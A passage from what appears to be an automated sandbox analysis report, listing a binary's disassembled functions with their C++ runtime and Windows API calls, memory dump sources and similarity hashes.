                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                        • API String ID: 3664257935-2084034818
                                                                                                                                                                        • Opcode ID: d0d6caeff6e16acc5ab1a15b50a192966e303bc7e787732771cd34b0e973e288
                                                                                                                                                                        • Instruction ID: 38a17c46b580d8ca98af7bb1a17fa9adba1b8bfb4b68b557d4800c6f458bf433
                                                                                                                                                                        • Opcode Fuzzy Hash: d0d6caeff6e16acc5ab1a15b50a192966e303bc7e787732771cd34b0e973e288
                                                                                                                                                                        • Instruction Fuzzy Hash: 4111CA32E04325ABCF229B689C41B5937949F12772F544260FF25FB280D774ED04A7D5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F62DEE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,72A902E8,?,?,00000000,00F76A6C,000000FF,?,00F62DC1,?,?,00F62D95,?), ref: 00F62E23
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F62E35
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00F76A6C,000000FF,?,00F62DC1,?,?,00F62D95,?), ref: 00F62E57
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                        • Opcode ID: 454b832fc01998dbc6951577892e906b7c72299461d1aee50b50c0c9dd7f27d2
                                                                                                                                                                        • Instruction ID: edac9e5e328ca27129b5fdbc1a8a50206f4b39610ee3beb33e1abb3ddee3e10d
                                                                                                                                                                        • Opcode Fuzzy Hash: 454b832fc01998dbc6951577892e906b7c72299461d1aee50b50c0c9dd7f27d2
                                                                                                                                                                        • Instruction Fuzzy Hash: 1E01A731918B1DABDB129F40CC05FAFBBB9FB44B10F004525F815E22A0DB759900DB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F66DB9 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00F66E40
                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00F66F01
                                                                                                                                                                        • __freea.LIBCMT ref: 00F66F68
                                                                                                                                                                          • Part of subcall function 00F65BDC: HeapAlloc.KERNEL32(00000000,00000000,00F63841,?,00F6543A,?,00000000,?,00F56CE7,00000000,00F63841,00000000,?,?,?,00F6363B), ref: 00F65C0E
                                                                                                                                                                        • __freea.LIBCMT ref: 00F66F7D
                                                                                                                                                                        • __freea.LIBCMT ref: 00F66F8D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1096550386-0
                                                                                                                                                                        • Opcode ID: 93de434a40671367c6f55b63474d5d31fd7b4c53008ab27f29ae3e84b2ce87b3
                                                                                                                                                                        • Instruction ID: 6ed37c7ced05e5905b8249c41975afb8382cabbd23c370953588933b52e2bc37
                                                                                                                                                                        • Opcode Fuzzy Hash: 93de434a40671367c6f55b63474d5d31fd7b4c53008ab27f29ae3e84b2ce87b3
                                                                                                                                                                        • Instruction Fuzzy Hash: 09519072A00206AFEB219FA5DC81EBF7AA9EF54764B150229FD04D7151F735DC10B760
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3B8B0 Relevance: 7.6, APIs: 5, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B8DD
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B900
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B928
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F3B98D
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B9B7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 459529453-0
                                                                                                                                                                        • Opcode ID: 6cd991276e04835ba34c916d6f36d0fed1b91c6402fc7b35d6d68beaa2aa5c0d
                                                                                                                                                                        • Instruction ID: 5bad69d9f45332281d22f02824acfe03005411300adbb709c65469567f28a10e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6cd991276e04835ba34c916d6f36d0fed1b91c6402fc7b35d6d68beaa2aa5c0d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9A310631D01218DFCB11CF54D990BAEBBB4EF24334F144159EA046B3A1DB35AE01EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F35890 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 60COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,76ED4450,00F35646,?,?,?,?,?), ref: 00F35898
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                                                                                                                        • API String ID: 1452528299-1782174991
                                                                                                                                                                        • Opcode ID: a7ad338a37c776e7e59367e4a35f215c0bdd3bb9c1ccb662b5f0057e1da73ca4
                                                                                                                                                                        • Instruction ID: ea442c78fff1aa600f8cc873ffe924270823cd926eea2f8a56c2540954e95bde
                                                                                                                                                                        • Opcode Fuzzy Hash: a7ad338a37c776e7e59367e4a35f215c0bdd3bb9c1ccb662b5f0057e1da73ca4
                                                                                                                                                                        • Instruction Fuzzy Hash: 3C118E56E1162587CB302F6CD8003A6B2E4DF90B74F65047FE889D7392EAB98C81A394
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F41C42 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Maklocstr$Maklocchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2020259771-0
                                                                                                                                                                        • Opcode ID: e822b428384f5cf927c2b830cf53579db6d2aa42234418f3855afb998f49694f
                                                                                                                                                                        • Instruction ID: a3645a512ece124c0e37acec273f08a27b5aa4fab1b05b4d7716dbab55ea7889
                                                                                                                                                                        • Opcode Fuzzy Hash: e822b428384f5cf927c2b830cf53579db6d2aa42234418f3855afb998f49694f
                                                                                                                                                                        • Instruction Fuzzy Hash: 951191B1940784BFE720DBA4CC81F52BBECBF04750F040519FA55CBA41D268FC9497A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3D87C Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F3D883
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D88D
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • numpunct.LIBCPMT ref: 00F3D8C7
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F3D8DE
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D8FE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 743221004-0
                                                                                                                                                                        • Opcode ID: dccd47c2c63d05e4372774c8000d2e186f6a27ec63241096fc0d7e9754282f9b
                                                                                                                                                                        • Instruction ID: 9ffb3cb021d0df5b9ccf580af35667caed58ab6dcf9af08df59a121a9dea94c7
                                                                                                                                                                        • Opcode Fuzzy Hash: dccd47c2c63d05e4372774c8000d2e186f6a27ec63241096fc0d7e9754282f9b
                                                                                                                                                                        • Instruction Fuzzy Hash: DE11CE35D0061ADFCB09FB64AC416BE7B60AF84730F240459F911AB2D1CF78AE05AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F422FA Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42301
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4230B
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • codecvt.LIBCPMT ref: 00F42345
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4235C
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4237C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 712880209-0
                                                                                                                                                                        • Opcode ID: a27a86e3a5144d13edc9973fa1a62885075704da6d2b1f8ad42b43c3f96a4bb3
                                                                                                                                                                        • Instruction ID: 62cd35d2af9d8fcc505e281b31c14597def64ee5e1ec76cc257d88074e9e2c9d
                                                                                                                                                                        • Opcode Fuzzy Hash: a27a86e3a5144d13edc9973fa1a62885075704da6d2b1f8ad42b43c3f96a4bb3
                                                                                                                                                                        • Instruction Fuzzy Hash: 4901C031900619DBCB05EB64DC41ABEBBB0AF80720F250519F914AB3D2DF7C9E05AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4238F Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42396
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F423A0
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • codecvt.LIBCPMT ref: 00F423DA
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F423F1
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42411
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 712880209-0
                                                                                                                                                                        • Opcode ID: 60399aa4ede025215fd9d03295115a201834976d42152d336d78de5ffbb85f50
                                                                                                                                                                        • Instruction ID: 57ce6552136268a3d491f827611622f7b8a2138c9748beaac85eba20b44209cf
                                                                                                                                                                        • Opcode Fuzzy Hash: 60399aa4ede025215fd9d03295115a201834976d42152d336d78de5ffbb85f50
                                                                                                                                                                        • Instruction Fuzzy Hash: BF01C031900219DBCB05EB649C416BE7BB1BF80720F240419F9106B2D2CFBC9E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F424B9 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F424C0
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F424CA
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • collate.LIBCPMT ref: 00F42504
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4251B
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4253B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1007100420-0
                                                                                                                                                                        • Opcode ID: 59f2c9dce089709517fc5843e30aa9d91e972ee1d4fa9bce7ee4db396fd29099
                                                                                                                                                                        • Instruction ID: a7b81481d332c681f47a52e0567b898596eb4934324653fbd4de54ca63b071c0
                                                                                                                                                                        • Opcode Fuzzy Hash: 59f2c9dce089709517fc5843e30aa9d91e972ee1d4fa9bce7ee4db396fd29099
                                                                                                                                                                        • Instruction Fuzzy Hash: C701D231900619DBCB05EB64DC456BE7B60AF84730F250419F910AB3D2CF789E05BB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F42424 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4242B
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42435
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • collate.LIBCPMT ref: 00F4246F
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42486
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F424A6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1007100420-0
                                                                                                                                                                        • Opcode ID: 59a340c1da3e8d3556afecc62b59908d5e09e0577dbbb01d7274f29a6ee3b561
                                                                                                                                                                        • Instruction ID: 7132f5c97c606bb244e5e9858aa27dfb9e73738f185fedd0a99bb2c089e9414c
                                                                                                                                                                        • Opcode Fuzzy Hash: 59a340c1da3e8d3556afecc62b59908d5e09e0577dbbb01d7274f29a6ee3b561
                                                                                                                                                                        • Instruction Fuzzy Hash: 13018031900619DBCB05EB64DC416BEBF61AF84730F250419F9146B3D2DF789E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F425E3 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F425EA
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F425F4
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • messages.LIBCPMT ref: 00F4262E
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42645
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42665
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2750803064-0
                                                                                                                                                                        • Opcode ID: 0d46b8e6adfc85ad8c1c42537ab3cef6fa2d66a1782dbfe158294973c67aefba
                                                                                                                                                                        • Instruction ID: be96df7534fdcd8a7e0bfb0caf2f093d962d7e09ce5b93f291acaed534f545ee
                                                                                                                                                                        • Opcode Fuzzy Hash: 0d46b8e6adfc85ad8c1c42537ab3cef6fa2d66a1782dbfe158294973c67aefba
                                                                                                                                                                        • Instruction Fuzzy Hash: D701CC31900219DBCB05FB649C51ABE7BA0BF80760F254419F910AB3D2CF789E01EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4254E Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • ctype.LIBCPMT ref: 00F42599
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F425B0
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 83828444-0
                                                                                                                                                                        • Opcode ID: 87ba56ff98927c68e8fff656774dcee4362844064d50ded4d42426e04a173b03
                                                                                                                                                                        • Instruction ID: 2cdcea3b5a7e975673b5cb798c51c75b653d07012a5ee140a503374c63e7d5cf
                                                                                                                                                                        • Opcode Fuzzy Hash: 87ba56ff98927c68e8fff656774dcee4362844064d50ded4d42426e04a173b03
                                                                                                                                                                        • Instruction Fuzzy Hash: EB010032800219DBCB00EB64CC41ABE7B70AF84320F280419F910AB2D2DF789E05FB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3D6BD Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F3D6C4
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D6CE
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • codecvt.LIBCPMT ref: 00F3D708
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F3D71F
